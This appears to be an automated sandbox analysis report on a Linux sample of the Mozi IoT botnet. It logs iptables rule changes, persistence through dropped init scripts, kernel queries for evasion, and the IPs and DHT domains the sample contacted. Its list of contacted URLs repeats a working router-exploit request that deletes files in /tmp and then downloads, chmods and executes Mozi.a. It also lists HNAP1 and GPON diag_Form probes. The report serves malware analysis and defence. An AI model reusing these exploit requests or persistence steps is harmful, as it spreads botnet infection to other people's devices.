Source: /tmp/KnAY2OIPI3 (PID: 5133) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5139) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5167) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5177) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5206) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 18022 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5218) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5245) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5250) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT" Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4635) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4668) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4671) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4707) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4733) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4754) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4776) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4811) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4814) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4823) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4846) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4894) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4920) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4944) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4948) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4957) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4980) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5024) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5032) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5053) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5080) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5107) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5135) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5149) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5172) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5186) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5227) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5249) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5252) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT Jump to behavior
Reads system information from the proc file system
Source: /tmp/KnAY2OIPI3 (PID: 4623) Reads from proc file: /proc/stat Jump to behavior
Sample tries to set the executable flag
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes ELF files to disk
Source: /tmp/KnAY2OIPI3 (PID: 4596) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/KnAY2OIPI3 (PID: 4596) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directories
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/mountall.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/checkfs.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/umountnfs.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/mountkernfs.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/checkroot-bootclean.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/mountnfs-bootclean.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/bootmisc.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/checkroot.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/hostname.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/mountdevsubfs.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/mountall-bootclean.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/init.d/mountnfs.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /usr/sbin/alsa-info.sh Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 34784 -> 7574

Malware Analysis System Evasion:

barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/KnAY2OIPI3 (PID: 4577) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4619) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/modprobe (PID: 4647) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5315) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5357) Queries kernel information via 'uname': Jump to behavior
Source: kvm-test-1-run.sh.8.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.8.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.8.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.8.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.8.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.8.dr Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.8.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.8.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.8.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.8.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: functions.sh0.8.dr Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.8.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.8.dr Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.8.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.8.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.8.dr Binary or memory string: --qemu-cmd)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu builddir
Source: functions.sh0.8.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.8.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.8.dr Binary or memory string: identify_qemu () {

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
59.92.7.51
 unknown India
9829 BSNL-NIBNationalInternetBackboneIN false
121.97.146.176
 unknown Philippines
6648 BAYAN-TELECOMMUNICATIONSBayanTelecommunicationsIncPH false
211.35.117.179
 unknown Korea Republic of
9643 SIGNGATE-ASKICAKR false
89.141.126.147
 unknown Spain
12430 VODAFONE_ESES false
123.45.141.9
 unknown Korea Republic of
6619 SAMSUNGSDS-AS-KRSamsungSDSIncKR false
103.139.115.132
 unknown Singapore
138893 IDNIC-PTPMT-AS-IDPTPRIMAMULTITERMINALID false
130.67.62.44
 unknown Norway
2119 TELENOR-NEXTELTelenorNorgeASNO false
73.11.11.167
 unknown United States
7922 COMCAST-7922US false
65.171.3.34
 unknown United States
1239 SPRINTLINKUS false
217.151.165.60
 unknown Iceland
12969 VODAFONE_ICELANDIS false
121.211.248.199
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
176.23.157.80
 unknown Denmark
3292 TDCTDCASDK false
185.149.152.118
 unknown Lithuania
15419 LRTC-ASLT false
68.55.232.254
 unknown United States
7922 COMCAST-7922US false
102.198.183.70
 unknown unknown
36926 CKL1-ASNKE false
164.87.137.230
 unknown United States
721 DNIC-ASBLK-00721-00726US false
195.167.58.217
 unknown Greece
6799 OTENET-GRAthens-GreeceGR false
197.81.37.161
 unknown South Africa
10474 OPTINETZA false
195.220.247.126
 unknown France
2200 FR-RENATERReseauNationaldetelecommunicationspourlaTec false
83.177.255.20
 unknown Sweden
2119 TELENOR-NEXTELTelenorNorgeASNO false
171.149.135.6
 unknown United States
9874 STARHUB-MOBILEStarHubLtdSG false
218.133.250.221
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
216.155.36.104
 unknown United States
39855 MOD-EUNL false
88.128.154.190
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
96.254.228.27
 unknown United States
5650 FRONTIER-FRTRUS false
185.8.165.103
 unknown Czech Republic
24971 MASTER-ASCzechRepublicwwwmasterczCZ true
38.112.119.34
 unknown United States
26677 ORION-ASNCA false
130.196.33.127
 unknown United States
137 ASGARRConsortiumGARREU false
119.101.173.5
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
124.26.145.221
 unknown Japan 2510 INFOWEBFUJITSULIMITEDJP false
128.109.48.130
 unknown United States
81 NCRENUS false
160.20.53.101
 unknown Hong Kong
58411 GTDCL-HKUnitA-E13FGoldenSunCentreHK false
65.57.76.79
 unknown United States
3356 LEVEL3US false
126.182.147.115
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
74.26.22.165
 unknown United States
7922 COMCAST-7922US false
135.91.62.232
 unknown United States
10455 LUCENT-CIOUS false
101.132.239.79
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
84.203.232.63
 unknown Ireland
31122 DIGIWEB-ASIE false
218.85.205.133
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
160.173.189.54
 unknown Morocco
6713 IAM-ASMA false
222.191.119.202
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
53.220.117.17
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
193.115.92.108
 unknown Australia
7545 TPG-INTERNET-APTPGTelecomLimitedAU false
38.198.214.3
 unknown United States
174 COGENT-174US false
77.94.17.59
 unknown Kazakhstan
21299 KAR-TEL-ASAlmatyRepublicofKazakhstanKZ false
19.252.51.218
 unknown United States
3 MIT-GATEWAYSUS false
29.11.239.185
 unknown United States
7922 COMCAST-7922US false
1.151.13.11
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
216.26.159.203
 unknown United States
14594 PAYMENTALLIANCEUS false
49.40.181.238
 unknown India
55836 RELIANCEJIO-INRelianceJioInfocommLimitedIN false
129.39.197.165
 unknown United States
2686 ATGS-MMD-ASUS false
126.66.70.2
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
171.37.201.166
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
64.227.0.234
 unknown United States
14061 DIGITALOCEAN-ASNUS false
167.108.60.0
 unknown Uruguay
6057 AdministracionNacionaldeTelecomunicacionesUY false
220.131.247.227
 unknown Taiwan; Republic of China (ROC)
3462 HINETDataCommunicationBusinessGroupTW false
124.106.81.28
 unknown Philippines
9299 IPG-AS-APPhilippineLongDistanceTelephoneCompanyPH false
222.118.224.59
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
32.38.64.238
 unknown United States
2686 ATGS-MMD-ASUS false
62.37.123.164
 unknown Spain
12479 UNI2-ASES false
37.198.64.4
 unknown Sweden
1257 TELE2EU false
179.5.114.184
 unknown El Salvador
14754 TelguaGT false
218.99.163.37
 unknown China
17966 CIBNChinaInformationBroadcastNetworkLtdCoCN false
150.94.181.169
 unknown Japan 6400 CompaniaDominicanadeTelefonosSADO false
103.167.29.254
 unknown unknown
7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe false
133.53.157.82
 unknown Japan 4729 JAEAJapanAtomicEnergyAgencyJP false
105.23.23.99
 unknown Mauritius
37100 SEACOM-ASMU false
217.26.218.59
 unknown United Kingdom
31042 SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemreze false
122.14.26.131
 unknown China
4808 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN false
165.147.231.202
 unknown South Africa
5713 SAIX-NETZA false
27.208.150.177
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
100.58.97.165
 unknown United States
701 UUNETUS false
196.2.152.33
 unknown South Africa
10474 OPTINETZA false
38.66.167.189
 unknown United States
22898 ATLINKUS false
115.216.161.117
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
211.249.221.67
 unknown Korea Republic of
7625 DAUM-ASKakaoCorpKR false
193.63.110.24
 unknown United Kingdom
786 JANETJiscServicesLimitedGB false
41.209.27.240
 unknown Kenya
9129 KE-NET2000ZA false
91.39.50.75
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE true
192.170.164.35
 unknown United States
36315 SERVPACUS false
123.144.168.163
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
58.178.78.48
 unknown Australia
9443 VOCUS-RETAIL-AUVocusRetailAU false
72.185.234.219
 unknown United States
33363 BHN-33363US false
40.108.216.138
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
54.161.176.221
 unknown United States
14618 AMAZON-AESUS false
86.112.104.146
 unknown United Kingdom
9142 CommercialISPGB false
56.99.140.32
 unknown United States
2686 ATGS-MMD-ASUS false
42.117.16.157
 unknown Viet Nam
18403 FPT-AS-APTheCorporationforFinancingPromotingTechnolo false
216.144.192.30
 unknown United States
27553 TELNETUS false
69.1.46.186
 unknown United States
12083 WOW-INTERNETUS false
191.125.31.198
 unknown Chile
7418 TELEFONICACHILESACL false
98.125.252.19
 unknown United States
209 CENTURYLINK-US-LEGACY-QWESTUS false
172.200.33.30
 unknown United States
18747 IFX18747US false
221.136.83.195
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
170.102.192.11
 unknown Sweden
209236 HCLTECHNOLOGIES-SE false
124.164.21.186
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
20.177.182.208
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
162.165.207.141
 unknown United States
21928 T-MOBILE-AS21928US false
181.228.162.132
 unknown Argentina
10481 TelecomArgentinaSAAR false
182.90.150.203
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false

Contacted Domains

Name IP Active
dht.transmissionbt.com 212.129.33.59 true
bttracker.acc.umu.se 130.239.18.159 true
router.bittorrent.com 67.215.246.10 true
router.utorrent.com 82.221.103.244 true
bttracker.debian.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://127.0.0.1:7574/UD/act?1 false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://172.82.182.74:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://155.230.225.129:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://134.84.133.102:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://23.78.24.125:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://171.247.8.159:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://66.221.91.189:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://199.204.251.131:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://216.164.6.45:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://173.222.98.151:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://127.0.0.1:80/GponForm/diag_Form?images/ true
  • Avira URL Cloud: safe
 unknown
http://168.226.35.54:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://164.132.44.102:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://127.0.0.1:8080/GponForm/diag_Form?images/ true
  • Avira URL Cloud: safe
 unknown
http://149.47.68.142:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://182.254.240.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://38.35.98.151:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://65.110.89.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://114.158.233.160:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://92.122.164.134:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://52.58.36.52:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown